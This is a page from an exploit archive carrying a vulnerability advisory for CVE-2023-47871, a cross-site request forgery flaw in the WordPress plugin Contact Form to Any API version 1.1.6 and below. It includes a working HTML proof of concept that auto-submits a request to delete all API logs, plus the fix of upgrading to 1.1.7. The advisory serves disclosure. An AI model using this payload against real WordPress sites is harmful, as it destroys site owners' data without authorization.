Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- WordPress Contact Form To Any API 1.1.6 Cross Site Request Forgery[6]
- Authored by Arvandy[7]
-
WordPress Contact Form to Any API plugin versions 1.1.6 and below suffer from a cross site request forgery vulnerability.
- advisories | CVE-2023-47871[8]
- SHA-256 |
03ad6d7bbc688e1d575a7df7d7cd83f2c669c4b661b09e12af2cd32fdee22ca6
- Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
# Exploit Title: WP Plugins Contact Form to Any API <= 1.1.6 - CSRF
# Date: 09-12-2023
# Exploit Author: Arvandy
# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/
# Vendor Homepage: https://www.itpathsolutions.com/
# Version: 1.1.6
# Tested on: Windows, Linux
# CVE: CVE-2023-47871
# Product Description
Contact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.
# Vulnerability overview
The Wordpress plugins Contact Form to Any API <= 1.1.6 is vulnerable to Cross-Site Request Forgery in the Delete All Log function. This vulnerability could lead to unauthorized deletion of API Logs.
# Proof of Concept
<html>
<body>
<form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="cf7_to_any_api_bulk_log_delete" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
# Recommendation
Upgrade to version 1.1.7
File Tags
- ActiveX[19] (932)
- Advisory[20] (83,427)
- Arbitrary[21] (16,433)
- BBS[22] (2,859)
- Bypass[23] (1,803)
- CGI[24] (1,031)
- Code Execution[25] (7,424)
- Conference[26] (683)
- Cracker[27] (843)
- CSRF[28] (3,355)
- DoS[29] (24,066)
- Encryption[30] (2,372)
- Exploit[31] (52,299)
- File Inclusion[32] (4,234)
- File Upload[33] (979)
- Firewall[34] (822)
- Info Disclosure[35] (2,811)
- Intrusion Detection[36] (900)
- Java[37] (3,091)
- JavaScript[38] (880)
- Kernel[39] (6,855)
- Local[40] (14,586)
- Magazine[41] (586)
- Overflow[42] (12,871)
- Perl[43] (1,427)
- PHP[44] (5,163)
- Proof of Concept[45] (2,350)
- Protocol[46] (3,657)
- Python[47] (1,570)
- Remote[48] (31,071)
- Root[49] (3,607)
- Rootkit[50] (515)
- Ruby[51] (614)
- Scanner[52] (1,645)
- Security Tool[53] (7,930)
- Shell[54] (3,214)
- Shellcode[55] (1,216)
- Sniffer[56] (897)
- Spoof[57] (2,229)
- SQL Injection[58] (16,449)
- TCP[59] (2,419)
- Trojan[60] (687)
- UDP[61] (896)
- Virus[62] (667)
- Vulnerability[63] (32,118)
- Web[64] (9,792)
- Whitepaper[65] (3,759)
- x86[66] (966)
- XSS[67] (18,055)
- Other[68]
File Archives
- December 2023[69]
- November 2023[70]
- October 2023[71]
- September 2023[72]
- August 2023[73]
- July 2023[74]
- June 2023[75]
- May 2023[76]
- April 2023[77]
- March 2023[78]
- February 2023[79]
- January 2023[80]
- Older[81]
Systems
- AIX[82] (429)
- Apple[83] (2,037)
- BSD[84] (375)
- CentOS[85] (57)
- Cisco[86] (1,926)
- Debian[87] (6,915)
- Fedora[88] (1,692)
- FreeBSD[89] (1,246)
- Gentoo[90] (4,379)
- HPUX[91] (880)
- iOS[92] (363)
- iPhone[93] (108)
- IRIX[94] (220)
- Juniper[95] (69)
- Linux[96] (47,903)
- Mac OS X[97] (691)
- Mandriva[98] (3,105)
- NetBSD[99] (256)
- OpenBSD[100] (486)
- RedHat[101] (14,657)
- Slackware[102] (941)
- Solaris[103] (1,611)
- SUSE[104] (1,444)
- Ubuntu[105] (9,155)
- UNIX[106] (9,341)
- UnixWare[107] (187)
- Windows[108] (6,611)
- Other[109]
- Services
- Security Services[120]
- Hosting By
- Rokasec[121]